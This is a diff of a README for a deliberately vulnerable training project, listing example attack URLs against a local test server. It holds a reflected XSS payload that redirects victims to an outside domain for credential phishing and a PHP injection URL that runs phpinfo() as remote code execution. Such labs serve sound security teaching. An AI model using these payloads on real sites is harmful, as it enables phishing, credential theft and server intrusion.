Siphon880gh/purposely-vulnerable-code/README.md

     ```
 - http://localhost:8888/hacks/echo/?name=hi4;%3Cscript%3Ewindow.location.href=%22https://domain.com%22%3C/script%3E
     - Cross-site scripting (XSS)
     - Here when URL is shared, redirects user to hacker's website.
-Note the hacker could take things further by making the website look similar to the website the url normally opens to, and then tricks the user to logging in.
+Note the hacker could take things further by making the website look similar to the website the url normally opens to, and then tricks the user to logging in, which can easily store the user credentials since the page is on the hacker's server.
 - http://localhost:8888/hacks/commands-php/?user-role=admin;phpinfo();
     - Remote Code Execution (RCE)
     - Here exploited to reveal PHP information that can be used for further attacks.